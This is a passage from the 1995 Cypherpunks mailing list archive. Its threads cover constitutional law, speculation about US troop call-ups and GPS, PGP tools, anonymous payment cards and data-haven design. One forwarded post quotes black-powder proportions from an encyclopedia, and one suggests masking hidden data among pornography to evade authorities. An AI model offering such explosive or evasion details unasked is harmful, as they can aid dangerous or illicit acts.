It is not > the supreme law of the land for nothing. > > From mccoy at io.com Tue Jan 10 23:12:17 1995 From: mccoy at io.com (Jim McCoy) Date: Tue, 10 Jan 95 23:12:17 PST Subject: Pornography, What is it? In-Reply-To: <199501110033.SAA00514@einstein.ssz.com> Message-ID: <199501110712.BAA22058@pentagon.io.com> > From: root [...] > Also, the 1st Amendment says that Congress shall make no law, it doesn't say > a damn thing about the states doing it. While in 1850 this might have been the case, you should check some of the later amendments for and update on what has happened in the last 150 years of Con Law... jim From skaplin at mirage.skypoint.com Tue Jan 10 23:17:05 1995 From: skaplin at mirage.skypoint.com (Samuel Kaplin) Date: Tue, 10 Jan 95 23:17:05 PST Subject: Storm Signals In-Reply-To: <199501101924.OAA29627@bb.hks.net> Message-ID: <4Rn4lKjqRCC3075yn@mirage.skypoint.com> In article <199501101924.OAA29627 at bb.hks.net>, you wrote: > [BEGIN PGP SIGNED MESSAGE] > [BEGIN PGP SIGNED MESSAGE] > > On a social mailing list that I'm on, two things have been noticed in > the last week: > > 1: Somebody's roommate (a Green Beret) has been called back into > 6 months of active service. He was not told where he'd > be. > > 2: GPS fine positioning has been turned off. This is only done > during times of military operations (such as the 'invasion' > of Haiti and the Iraq Massacre). It's also been highly > correlated with Pentagon pizza deliveries. > > Anybody else have any clues as to what's up? Perhaps Bosnia? -- ============================================================================== skaplin at skypoint.com | Finger skaplin at infinity.c2.org for | a listing of crypto related files PGP encrypted mail is accepted and | available on my auto-responder. preferred. | (Yes...the faqs are there!) | E-mail key at four11.com for PGP Key or | "...vidi vici veni" - Overheard Finger skaplin at mirage.skypoint.com | outside a Roman brothel. ============================================================================== A fanatic is one who can't change his mind and won't change the subject. From tcmay at netcom.com Tue Jan 10 23:46:44 1995 From: tcmay at netcom.com (Timothy C. May) Date: Tue, 10 Jan 95 23:46:44 PST Subject: Pornography, What is it? In-Reply-To: <199501110033.SAA00514@einstein.ssz.com> Message-ID: <199501110734.XAA16586@netcom20.netcom.com> root wrote: > Also, the 1st Amendment says that Congress shall make no law, it doesn't say > a damn thing about the states doing it. When I read this amendment what I see > is the founding fathers saying it is up to each state to decide for themselves. > ... > The 1st. Amendment says nothing about what the states can do, only Congress. The Amendment(s) may read "Congress shall make no law...," but the states are *not* in fact able to pass laws restricting freedom of speech, establish religions, quarter troops, and so on. Or, rather, they may go ahead and pass such laws, but the Supreme Court will generally strike them down as being "unconstitutional." See how far Utah would get in establishing Mormonism as the official state religion ("But the Constitution says _Congress_ shall make not no, and we're not the Congress, so there!"). Deviations exist, of coure. The Second Amendment is in fact routinely trampled by various states and local jurisdictions, as states ban various types of guns, etc. There is hope in the gun rights community that the Supremes will someday deign to hear a case on this and so strike down these laws which clearly controvert the Constitution. I'm not a lawyer, and it's been 25 years since I was in a "civics" class, so I'm sorry to not recall the precise language by which "Congress shall make no law" also is taken to apply to Sacramento, Albany, Austin, and so forth. --Tim May From david.lloyd-jones at canrem.com Wed Jan 11 00:22:42 1995 From: david.lloyd-jones at canrem.com (David Lloyd-Jones) Date: Wed, 11 Jan 95 00:22:42 PST Subject: January meeting with Message-ID: <60.18618.6525.0C1C8733@canrem.com> LE+> The following is a message from my lawyer, Phil Dubois. He posted it +> to alt.security.pgp, and I thought I should post it here as well. The +> message is signed with his key. +> +> --Philip Zimmermann +> LE+The aforementioned signed message from PKZ's lawyer message failed +signature check on my system, apparently because it contained a very +long text line which, somewhere along the way, was chopped into two +lines before it arrived in my mailbox. LE+The two lines as they appeared in my message (which failed signature +test) are: Well, there it is. Phil goes free. -dlj. david.lloyd-jones at canrem.com * 1st 1.11 #3818 * Gingrich, n. abbrev. : "giving to the rich". From tedwards at src.umd.edu Wed Jan 11 00:29:41 1995 From: tedwards at src.umd.edu (Thomas Grant Edwards) Date: Wed, 11 Jan 95 00:29:41 PST Subject: Pornography, What is it? In-Reply-To: <199501110734.XAA16586@netcom20.netcom.com> Message-ID: On Tue, 10 Jan 1995, Timothy C. May wrote: > The Amendment(s) may read "Congress shall make no law...," but the > states are *not* in fact able to pass laws restricting freedom of speech, > establish religions, quarter troops, and so on. Or, rather, they may > go ahead and pass such laws, but the Supreme Court will generally > strike them down as being "unconstitutional." The 14th Amendment ensures that states shall not infringe on all "privileges and immunities" of citizens of the USA. The Slaughterhouse cases created an interesting judgement that the 14th is not talking about all rights of American citizens, but only those coming directly from citizenship, thus the Supreme Court must explicitly "incorporate" parts of the Bill of Rights via the 14th Amendment to the States. While freedom of speech has been "incorporated," the right to trial by jury has not, and neither has the Second Amendment for either individual right to keep and bear arms or collective (state government) right to keep and bear arms. It is pretty obvious the 14th was established to limit the ability of State's to infringe on the civil rights of blacks. After reading the Slaughterhouse cases, I side with the dissenting Justices and feel that it should apply to all rights mentioned in the Constitution. But that isn't the law... (This is a fairly commong thread on talk.politics.guns) -Thomas From lmccarth at ducie.cs.umass.edu Wed Jan 11 00:37:59 1995 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Wed, 11 Jan 95 00:37:59 PST Subject: Storm Signals Message-ID: <199501110842.DAA07468@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Sam Kaplin writes: > Todd Masco writes: > > 1: Somebody's roommate (a Green Beret) has been called back into > > 6 months of active service. He was not told where he'd be. > > Perhaps Bosnia? I doubt it. The only sort of Bosnian engagement that might make sense would involve a fairly conspicuous effort with a large number of troops. I can't see what a few thousand Green Berets could accomplish there. Frankly, I'm quite puzzled by these signs. I can't think of any country that seems due for a quick invasion by the USG, but the increase in granularity of the GPS information suggests an operation of greater magnitude than just a strike against terrorists, drug cartels etc. Is it time for Bay of Pigs II already ? ;) -L. Futplex McCarthy - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLxOY7Gf7YYibNzjpAQF7nwP+KUk7o1bpM76wmGrzv+KZIgi8kby1XHIj 4FzXLLZGLC8bVGGniv1NkLR76XH6HeLfWpaJu4LeCCBE6RbsgUD+bqEQeTdijpVg OJzOWM/Rt6/vTJT+/yiVpFBbPDgG1sXvy4SlQX0wSATNzjbdNHxoorory1fOmjRi 6RF2tHYFbTM= =Yk81 - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLxOZ9ioZzwIn1bdtAQFF/QGAiqkCeSwdxCMlF0AeO6jOJkaxKQ4EAe68 +AYM/slciv3rbqrkw6nRf19LM7AmXBsG =lDeV -----END PGP SIGNATURE----- From mccoy at io.com Wed Jan 11 01:11:56 1995 From: mccoy at io.com (Jim McCoy) Date: Wed, 11 Jan 95 01:11:56 PST Subject: Storm Signals In-Reply-To: <199501110842.DAA07468@bb.hks.net> Message-ID: <199501110911.DAA05932@pentagon.io.com> L. McCarthy writes: > Sam Kaplin writes: > > Todd Masco writes: > > > 1: Somebody's roommate (a Green Beret) has been called back into > > > 6 months of active service. He was not told where he'd be. > > Perhaps Bosnia? > > I doubt it. [...] > > Frankly, I'm quite puzzled by these signs. I can't think of any country that > seems due for a quick invasion by the USG, but the increase in granularity of > the GPS information suggests an operation of greater magnitude than just a > strike against terrorists, drug cartels etc. Military action also requires political will, and with the recent change in power in the US govt there is no way anything is going to happen for at least six months. Freshmen congressmen do not sign off on a war the first month they get into Washington unless the populace is frothing at the mouth to kill someone, and that isn't happening. Clinton does not have the political pull to get anything related to military action through Congress at this time, and he can't afford to challenge a legislature he no longer controls so any call to arms is probably not coming from the Executive branch. I also doubt he would be stupid enough to try a "Commander in Chief" action and hope that the Republicans would forget who scores the popularity points in such an activity and back him up, the legislature would crucify him with the electorate for trying move like this. OTOH, Green Berets are not the kind of troops used for "strike" actions. Thier primary specialty is low-intensity conflict and working with indigenous armies. Given the current geopolitical situation it seems that Bosnia is the only conflict that the US population cares about at all that would call for the use of Green Berets. Then again, maybe the military is just trying to increase its readiness in the hopes that a Republican legislature will let them use thier toys again... jim From skaplin at mirage.skypoint.com Wed Jan 11 01:59:51 1995 From: skaplin at mirage.skypoint.com (Samuel Kaplin) Date: Wed, 11 Jan 95 01:59:51 PST Subject: Storm Signals In-Reply-To: <199501110842.DAA07468@bb.hks.net> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- In article <199501110842.DAA07468 at bb.hks.net>, you wrote: > [BEGIN PGP SIGNED MESSAGE] > [BEGIN PGP SIGNED MESSAGE] > Sam Kaplin writes: > > Perhaps Bosnia? > > I doubt it. The only sort of Bosnian engagement that might make sense would > involve a fairly conspicuous effort with a large number of troops. I can't > see what a few thousand Green Berets could accomplish there. > > Frankly, I'm quite puzzled by these signs. I can't think of any country that > seems due for a quick invasion by the USG, but the increase in granularity of > the GPS information suggests an operation of greater magnitude than just a > strike against terrorists, drug cartels etc. > > Is it time for Bay of Pigs II already ? ;) Perhaps it is two unrelated events. Maybe the Russians are using GPS in their attack on Chechnya, and the administration decided "Not on our dime." The call up could possibly be related to the repatriacion of the Hatian boat people or even a continued presence in Hatii. I think Atistede still needs lots of proping up. The Ton-Ton Macoutes, from Baby Doc and Papa Doc's dictatorship were the police and military of the previous one. They just vanished into the population. Its almost the perfect guerilla force, just the thing the berets are into. This would be much more likely if the individual was of African decent. From what I have heard, prior to any military action in Hatii, we had a sizable force of Special Forces, Green Berets and other elete troops in place. Most of them were black. This was because they blended in with the populace. Perhaps the forces on the ground needed to be rotated and personnel came up short. I don't know...but if it is anything we, should find out real soon. Manditory crypto thought...I wonder if the government has taken any steps to prevent the INTERNET from being used for C3 functions, like it was used during the gulf war by Iraq. (I know...I know...pretty weak, but the communications has to have been encrypted. :) ) Sam BTW-You always do this to me Louis...I was just going to go to bed, and boom I'm up another hour. Grrrrrrrrrrr ;) - -- ============================================================================== skaplin at skypoint.com | Finger skaplin at infinity.c2.org for | a listing of crypto related files PGP encrypted mail is accepted and | available on my auto-responder. preferred. | (Yes...the faqs are there!) | E-mail key at four11.com for PGP Key or | "...vidi vici veni" - Overheard Finger skaplin at mirage.skypoint.com | outside a Roman brothel. ============================================================================== And Lao-tse said: Those who know don't tell; those who tell don't know. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBLxOqjslnXxBRSgfNAQGcRQf/YGwkpnr/BU9ePaONuGYkCpEwyMun/ymM nyxLcAH919I55RFUiTUO/5OEeD3bzb/JLR/K6jWIEKKSG4xtu9v6GucDmI7xowZG h3BRecyT3GQ5I6axo2a9ORdSMRW0A9wvnd3fGlXD5Zt6oJtCP9YikDPH2v2JrkQQ QwLcLfFbyFzPWu0OIj41sj9kT7V1Kg23ChV7gBjsF1D99cMtBvPmbVRDVb2yGigX ClKa8NDFPhZVyTxjnoBqLOR1H22iJweUtZ51KkQkjBkgp4OaB7477gwaSC9uzJJG 552OU4KX7NFFpdfl2EmpvfSQMV7W2YUZQqzok6J5Vb5Ll/vYgsJ+5g== =Whh9 -----END PGP SIGNATURE----- From rah at shipwright.com Wed Jan 11 04:40:22 1995 From: rah at shipwright.com (Robert Hettinga) Date: Wed, 11 Jan 95 04:40:22 PST Subject: credit card purchases Message-ID: Saw it there. Thought you might like it here... Cheers, Bob Hettinga >From: peace at BIX.com >Date: Wed, 11 Jan 1995 00:26:50 -0500 (EST) >Original-From: peace at BIX.com >Subject: credit card purchases >To: www-buyinfo at allegra.att.com >X-Cosy-To: www-buyinfo at allegra.att.com > > PGCHARGE > >This is a call for interested parties to participate in the alpha >test of an internet ordering program that will be offered to any >customer free of charge to create orders that should be >acceptable to any commercial establishment. > >This is a Windows program designed to generate secure charge card >orders over the internet. The payment mechanism is not the >critical component for this system, that critical component is >the use, by the purchaser, of the merchant's public key, for the >protection of sensitive data, including simple correspondence. > >Two paradigms from the commercial word, EDI and email were >selected for the implementation. Email operates in a store and >forward mode that has some security advantages over web or >network layer security. That advantage comes directly from the >fixed nature of the email message itself. Once it has been >created and signed by the keyholder, it cannot successfully be >altered by any other person. It is also possible for the message >to be encrypted at the point where it is created. Hiding the >contents of the message from anyone other than the intended >recipient. > >EDI has already achieved a great deal of acceptance in the >commercial world. This application is a natural use of the >existing ANSI X12 structures for issuing a purchase order. Any >merchant that is currently using X12 structures should be able to >purchase a single user ViaCrypt PGP license and be in business >accepting secure credit card orders over the internet. > >PGCHARGE does not add any security features by itself, but rather >facilitates security by building an EDI transaction for a >recipient selected from a PGP public keyring. This information >is then passed to PGP to be secured. PGCHARGE then waits for PGP >to complete, adds the appropriate email headers and invokes a >mailer program. > >This program can be downloaded from ftp.csn.org as >mpj/public/pgcharge.zip. Comments can be sent to peace at bix.com. > ----------------- Robert Hettinga (rah at shipwright.com) "There is no difference between someone Shipwright Development Corporation who eats too little and sees Heaven and 44 Farquhar Street someone who drinks too much and sees Boston, MA 02331 USA snakes." -- Bertrand Russell (617) 323-7923 From asgaard at sos.sll.se Wed Jan 11 04:46:29 1995 From: asgaard at sos.sll.se (Mats Bergstrom) Date: Wed, 11 Jan 95 04:46:29 PST Subject: TCM on BBC In-Reply-To: Message-ID: Timothy C. May wrote: > (I'll be travelling to LA on Friday, for > a television interview with the BBC on > crypto, and so will be unwired that day.) Please announce the date and time of the broadcast (if they tell you). Mats From parsons at bga.com Wed Jan 11 05:30:33 1995 From: parsons at bga.com (Brad Parsons) Date: Wed, 11 Jan 95 05:30:33 PST Subject: CBS/C.Chung Plan Hit Job on Internet? (fwd) Message-ID: ---------- Forwarded message ---------- Date: Tue, 10 Jan 95 21:02:06 PST From: Greg Bailey Subject: Re: CBS/C.Chung Plan Hit Job on Internet? Non sequitur, I think, Helen. The above reads like a lame lemma of the Gun Control theorem and is based on the same fallacious premises. Information is not intrinsically harmful. People are. Information and other means need not be controlled. People must control themselves. If the people in a society cannot control their temptations to do evil with whatever means are available to them, the society cannot be called civilized by any reasonable criteria. Making information available is not a crime. Blowing people up is a crime, and those who do it should pay pay pay. Any discipline worth studying gives its students the means to do good as well as evil, and at least in theory the more they know the greater their potential to act in either direction. Throughout history damn fools have tried to limit the scope of evil by limiting information. All it has demonstrated is that by doing so one can hamstring constructive activity while accomplishing nearly zero against evil due to its tenacity. It is my opinion that the most evil thing anyone can advocate is the limiting of information, especially since in many cases those who propose to do the limiting do not even faintly understand the info themselves. It is also my opinion that to resist any efforts to limit availability of information is *not* to bury one's head under the sand. Not at all. All the theory aside, any elementary school kid who pays attention and knows how to read can easily acquire the art of making gunpowder. At least this was true in the fifties when I was at that age, and being boys my friends and I of course spent many a happy hour out in secluded fields blowing things up in various ways. This sort of thing is basic information that anyone brighter than a rock can come by. Connie Chung displays an astounding level of ignorance by suggesting that high technology has much of anything to do with the phenomenon she reports upon. Instead she should be asking why kids now feel they should blow up people and property instead of old castaway junk. *That* is the story, not the Internet, not Encyclopaedia Britannica ... quoting from this year's edition, by the way, from our kids' book case: gunpowder ... The first such mixture was black powder, which consists of a mixture of saltpetre (potassium nitrate), sulfur, and charcoal. When prepared in roughly the correct proportions (75 percent saltpetre, 14 percent charcoal, and 11 percent sulfur), it burns rapidly when ignited and produces ... Because the burning of black powder is a surface phenomenon, a fine granulation burns faster than a coarse one ... [more straightforward practical information follows] I wonder if Connie reads the encyclopedia. I wonder if she even has one? Grins... Greg Bailey | ATHENA Programming, Inc | 503-621-3215 | ---------------- | 24680 NW Dixie Mtn Road | fax 621-3954 | greg at minerva.com | Hillsboro, OR 97124 US | From an158409 at anon.penet.fi Wed Jan 11 06:33:03 1995 From: an158409 at anon.penet.fi (beacher) Date: Wed, 11 Jan 95 06:33:03 PST Subject: privacy digest Message-ID: <9501111321.AA25946@anon.penet.fi> I am extremely sympathetic to the anti-abortion cause but the kind of abuse described in this item is unnerving. Although illegal and reprehensible, it is one thing for a government official, because of some strong conviction, to violate the law. It is completely another to violate it for money. Men, if they were men, who did this should have their privacies cut off. Subject: Computer Privacy Digest V6#003 Computer Privacy Digest Sat, 07 Jan 95 Volume 6 : Issue: 003 ------------------------------------------------------------------------- To find out more about the anon service, send mail to help at anon.penet.fi. Due to the double-blind, any mail replies to this message will be anonymized, and an anonymous id will be allocated automatically. You have been warned. Please report any problems, inappropriate use etc. to admin at anon.penet.fi. From corbet at stout.atd.ucar.edu Wed Jan 11 07:34:33 1995 From: corbet at stout.atd.ucar.edu (Jonathan Corbet) Date: Wed, 11 Jan 95 07:34:33 PST Subject: MBONE broadcasts next week Message-ID: <199501111534.IAA23174@atd.atd.ucar.EDU> The USENIX folks plan to broadcast (well..err...multicast) a number of talks from next week's conference over the MBONE. Details are still unavailable, but Evi has posted the following interesting list of folks: ---- Wednesday, January 18: Bruce Schneier, Counterpane Systems Cryptography Brad Chen, Harvard Univ Operating System Measurement Thursday, January 19: John Ousterhout, Sun Microsystems TCL for Internet Agents Bill Janssen, Xerox PARC ILU/CORBA Inter-Language Unification Nathaniel Borenstein, 1st Virtual Holdings Internet Information Commerce David Chaum, Digicash b.v. Cash on the Internet Friday, January 20: Hal Varian, Univ of Michigan Economics of the Internet Pavel Curtis, Xerox PARC The Internet at the Turn of the Millennium: How You'll Use It and Who You'll Meet There ---- The keynote will be Mark Weiser of Xerox PARC talking about their "ubiquitious computing" scheme, which has its own set of privacy implications... Details as I get them. jon Jonathan Corbet National Center for Atmospheric Research, Atmospheric Technology Division corbet at stout.atd.ucar.edu http://www.atd.ucar.edu/rdp/jmc.html From unicorn at access.digex.net Wed Jan 11 08:43:59 1995 From: unicorn at access.digex.net (Black Unicorn) Date: Wed, 11 Jan 95 08:43:59 PST Subject: Anonymous payment scheme In-Reply-To: Message-ID: On Sun, 8 Jan 1995, Samuel Kaplin wrote: > Date: Sun, 08 Jan 1995 20:20:18 -0600 > From: Samuel Kaplin > To: Eric Hughes , cypherpunks at toad.com > Subject: Re: Anonymous payment scheme > > -----BEGIN PGP SIGNED MESSAGE----- > > In article <199501021344.FAA11566 at largo.remailer.net>, you wrote: > > From: skaplin at skypoint.com (Samuel Kaplin) > > > > I was looking at at the bigger picture. Any merchant who accepts Visa or MC > > could now accept anonymous payments. No hassle at all on their part. > > [...] > > The key > > would be not to have the card attached to the account. If the card is > > attached to any type of account, then there are reporting requirements. > > > > Visa was talking about an electronic traveller's check, which, from > > what I could tell, instantiated an account in the sum of the value of > > the card purchased, which was then drawn down by purchase. The card, > > evidently, had no embossing on it. Personalization was limited to > > some account id which would last the lifetime of the balance and then > > disappear. > > This is EXACTLY what I was contemplating. I really wish they would > implement it. Then I can get the traveler's cheques out of my wallet. > (unsigned in both spots of, course.) Is this not essentially the same as the current pre-paid long distance Phone cards on the market? One would think the transition as easy for the credit card companies to make with a secured, disposable visa card. > > - -- > ============================================================================== > skaplin at skypoint.com | Finger skaplin at infinity.c2.org for > | a listing of crypto related files > PGP encrypted mail is accepted and | available on my auto-responder. > preferred. | (Yes...the faqs are there!) > | > E-mail key at four11.com for PGP Key or | "...vidi vici veni" - Overheard > Finger skaplin at mirage.skypoint.com | outside a Roman brothel. > ============================================================================== > Be careful when playing under the anvil tree. > > -----BEGIN PGP SIGNATURE----- > Version: 2.6.2 > > iQEVAwUBLxCfB8lnXxBRSgfNAQH6yAf/RMSqUXOHouTE3qKqaU/naHO8fdr8cEKL > EjAemhDQj5yVHeTz4YCT1p16CW8X+++fTXGsfZoCr7c+xxYoj/04OVC/u3UPvpJy > kAtwhbZhIG7ndKk2weoxZLTnxl5TVlkYjZUrufSccUw0ZfA6h27WrZNV7jFV89dk > c2xPr9oJ8dj/jwJtaNIR2KtTc9THWyxlGEIBzMn4mA1VeFz0I27uPK9RSs0M4eXb > JCW/ns92Gzwslq0/3n7d4JctGXar+9cUTjowPYRXinKX7wsyoKj5nN7HrCo8D5ot > W0KCfDzkn2YOGCj1CzkRkcW0wiGXI9kBXpCQVXJFlKZ6r7d5QnN0AA== > =B73o > -----END PGP SIGNATURE----- > > 073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est 6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa - wichtig! From unicorn at access.digex.net Wed Jan 11 08:56:21 1995 From: unicorn at access.digex.net (Black Unicorn) Date: Wed, 11 Jan 95 08:56:21 PST Subject: Data Haven problems In-Reply-To: <9501090448.AA14477@anchor.ho.att.com> Message-ID: On Sun, 8 Jan 1995 wcs at anchor.ho.att.com wrote: > Date: Sun, 8 Jan 95 23:48:36 EST > From: wcs at anchor.ho.att.com > To: dfloyd at io.com > Cc: cypherpunks at toad.com > Subject: Re: Data Haven problems > > dfloyd asks for ideas about preventing spamming in data havens, > for the code that he's working on. It's a hard job. > A related problem is how to prevent your data haven from becoming > the porno-ftp site of the week, and either being swamped with > traffic or raided by the Post Office Reactionary Neighborhood Police. > [Problems of payment schemes and lack of anonymous payment infastructure deleted] > Some operators may find it useful to limit the amount of data > that can be stored or retrieved by a specific user or site, > though this is less useful with anonymous and pseudonymous remailers > around, since "a specific user" becomes vaguer. > > Filtering by filename and type can also be useful - if you don't allow > files named *.gif and *.jpg, users may be less likely to > spam you with pornography. Namespace control in general is an issue - > do users get to choose filenames, or list directories, or do they > have to know the names of files to retrieve. > Another issue is whether files can only be retrieved by the sender - > probably a local policy issue. To some degree this requires the evaluation of the "authority attention" level the data haven has achieved. If the real sensitive data is more extreme than a porn deposit, (I assume we are talking 'legal' and not kiddie porn BTW) then the spam involved will serve to properly mask, to some degree, stego'd files within the porn. Part of a data haven, it seems to me, will be security by obscurity. Just on the basic level that a haven with all encrypted files will be somewhat secure by obscure, in that the authority most likely to be interested in the data probably will not be attentive. A repository holding some legitimate spam, be it porn or gifs or whatever, is unlikely to attract the level of SERIOUS attention that the sensitive data it contains may warrant. To sum: Spam's usefullness is a function of current authority attention, likely authority attention and authority attention the sensitive data warrants. > Some sites may only accept encrypted files, which reduces the spam > potential considerably, as well as reducing your exposure to the > porn police, though it's difficult to do anything about files that are > encrypted with a public key whose private key has been posted to the net, > or fake crypto headers in an otherwise unencrypted file, > unless you put in lots more code to check the insides of files and > watch the net for such postings, which is unrealistic. There's also > the problem that PGP and especially RIPEM files are non-stealthy, > and users may not want to leave even keyids in their files. A better policy might be to encrypt all files that are not encypted, perhaps through some key assignment system. The spam thus adds to the total traffic analysis problem, and the security of the spam is not material. i.e. better encrypted spam than plaintext spam. > Bill > -uni- (Dark) 0 073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est 6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa - wichtig! From unicorn at access.digex.net Wed Jan 11 09:17:08 1995 From: unicorn at access.digex.net (Black Unicorn) Date: Wed, 11 Jan 95 09:17:08 PST Subject: Data Haven problems In-Reply-To: Message-ID: On Mon, 9 Jan 1995, Alan Bostick wrote: > Date: Mon, 09 Jan 1995 13:46:11 -0800 > From: Alan Bostick > To: wcs at anchor.ho.att.com, dfloyd at io.com > Cc: cypherpunks at toad.com > Subject: Re: Data Haven problems > > -----BEGIN PGP SIGNED MESSAGE----- > > In article <9501090448.AA14477 at anchor.ho.att.com>, you wrote: > > > Filtering by filename and type can also be useful - if you don't allow > > files named *.gif and *.jpg, users may be less likely to > > spam you with pornography. Namespace control in general is an issue - > > do users get to choose filenames, or list directories, or do they > > have to know the names of files to retrieve. > > Another issue is whether files can only be retrieved by the sender - > > probably a local policy issue. > > Pornographic images aren't spam _per_se._ What makes them troublesome is > the huge number of people who wish to download them when their > availability is widely known. (My ISP's ftp site is being bogged down > by lots of accesses; it is speculated that these are people trying to > access pornography kept there.) In many ways this shows how publically available porn could just pummel traffic analysis. > > The obvious fix here is the same as the proposed fix for remailer > spamming: charge for access. > > As a (presumably) fixed-location data haven, one would want to be able > to use some kind of anonymous e-money for payment, but one could also > use good, old-fashioned credit card numbers, too. > > The feelthy peexture business might well be the cash cow that keeps a > data-haven/fortress remailer afloat (if that's not too mixed a metaphor). > > | PROOF-READER, n: A malefactor who atones for > Alan Bostick | making your writing nonsense by permitting > abostick at netcom.com | the compositor to make it unintelligible. > finger for PGP public key | Ambrose Bierce, THE DEVIL'S DICTIONARY > Key fingerprint: | > 50 22 FB 46 41 A3 17 9D F7 33 FF E1 4E 1C 89 79 +legal_kludge=off > > -----BEGIN PGP SIGNATURE----- > Version: 2.6.1 > > iQB1AgUBLxGxHOVevBgtmhnpAQEEnAL/blauOWwrahdpEK+NbH4WC5V5fekmUYdg > tT5VU+d2C5PGF9Bm5cXtNlZczbI84f+jsBmxRDlXQAsec56D7M7ZwjBMcp2X8t9Z > +FlsU90fRN3NGbYOK/vlSOmzjPBQxf8A > =gvPB > -----END PGP SIGNATURE----- > 073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est 6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa - wichtig! From jdwilson at gold.chem.hawaii.edu Wed Jan 11 09:23:34 1995 From: jdwilson at gold.chem.hawaii.edu (NetSurfer) Date: Wed, 11 Jan 95 09:23:34 PST Subject: Storm Signals Message-ID: <199501111727.MAA11495@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- > The call up could possibly be related to the repatriacion of the Hatian > boat people or even a continued presence in Hatii. I think Atistede still This past week we had a number of personnel sent to Haiti for the next 6 months. - -NetSurfer #include >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> == = = |James D. Wilson |V.PGP 2.7: 512/E12FCD 1994/03/17 > " " o " |P. O. Box 15432 | finger for full PGP key > " " / \ " |Honolulu, HI 96830 |====================================> \" "/ G \" |Serendipitous Solutions| Also NetSurfer at sersol.com > >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLxQU5yoZzwIn1bdtAQFVCQF/eZvusPABHtYtkIMm/q/AADIcaJtZ1Fna m202XMn6gdjl0j0SQAx9TEW9bt+pOxW+ =OzIN -----END PGP SIGNATURE----- From a.brown at nexor.co.uk Wed Jan 11 09:32:36 1995 From: a.brown at nexor.co.uk (Andy Brown) Date: Wed, 11 Jan 95 09:32:36 PST Subject: Crypto functions In-Reply-To: <199501102230.RAA01492@bb.hks.net> Message-ID: On Tue, 10 Jan 1995, L. Todd Masco wrote: > L. McCarthy noted that I didn't include sapphire, ...talking of which, is sapphire available outside of the USA? I'd quite like to have a look at it. - Andy +-------------------------------------------------------------------------+ | Andrew Brown Internet Telephone +44 115 952 0585 | | PGP (2048/9611055D): 69 AA EF 72 80 7A 63 3A C0 1F 9F 66 64 02 4C 88 | +-------------------------------------------------------------------------+ From tcmay at netcom.com Wed Jan 11 10:00:33 1995 From: tcmay at netcom.com (Timothy C. May) Date: Wed, 11 Jan 95 10:00:33 PST Subject: Storm Signals In-Reply-To: <199501110842.DAA07468@bb.hks.net> Message-ID: <199501111759.JAA18260@netcom10.netcom.com> L. McCarthy wrote: > Sam Kaplin writes: > > Todd Masco writes: > > > 1: Somebody's roommate (a Green Beret) has been called back into > > > 6 months of active service. He was not told where he'd be. > > > > Perhaps Bosnia? > > I doubt it. The only sort of Bosnian engagement that might make sense would > involve a fairly conspicuous effort with a large number of troops. I can't > see what a few thousand Green Berets could accomplish there. > > Frankly, I'm quite puzzled by these signs. I can't think of any country that > seems due for a quick invasion by the USG, but the increase in granularity of > the GPS information suggests an operation of greater magnitude than just a > strike against terrorists, drug cartels etc. CNN reported on Monday that U.S. troops are being sent back to Somalia to ensure and orderly and safe withdrawal of U.N. peacekeeping forces. This might explain the few thousand Green Berets being sent, if this is so. About the GPS, I have nok idea, though it seems plausible. I know this has no Cypherpunks relevance, but I see a lot of speculation, so I thought adding what CNN is reporting might help. --Tim -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From avi at clas.ufl.edu Wed Jan 11 10:42:15 1995 From: avi at clas.ufl.edu (Avi Harris Baumstein) Date: Wed, 11 Jan 95 10:42:15 PST Subject: anti clipper graffiti Message-ID: <199501111841.NAA09940@cutter.clas.ufl.edu> check out: and while you've got mosaic going, check this out on the same server: -avi From paul at poboy.b17c.ingr.com Wed Jan 11 10:59:24 1995 From: paul at poboy.b17c.ingr.com (Paul Robichaux) Date: Wed, 11 Jan 95 10:59:24 PST Subject: Storm Signals In-Reply-To: <199501111759.JAA18260@netcom10.netcom.com> Message-ID: <199501111859.AA02457@poboy.b17c.ingr.com> -----BEGIN PGP SIGNED MESSAGE----- Not relevant to cypherpunks-- just call me Carol Anne-- If I were the DOD, I would set the standard GPS default to selective availability. After all, with SA on military receivers can still get fine positioning data. If someone could come up with a good reason to turn SA off, great, but I wouldn't leave it on otherwise. The scenarios concerning GPS-piloted Cessnas full of nasty stuff come to mind, especially vis-a-vis the North Koreans. They probably don't have accurate IRBMs but they certainly could cobble together a Learjet-based delivery system. - -Paul - -- Paul Robichaux, KD4JZG | Good software engineering doesn't reduce the perobich at ingr.com | amount of work you put into a product; it just Not speaking for Intergraph. | redistributes it differently. ### http://www.intergraph.com ### -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLxQqpafb4pLe9tolAQGMfAP/WeMcDorjNsko7Qcvb34lPdg30/IHSJNV FoG2DOjwyBJhopHeeEpzzm629U2y7jM5+ipoTNl6DLh5tjJ3gQVfi0Lz6b/iyL+j 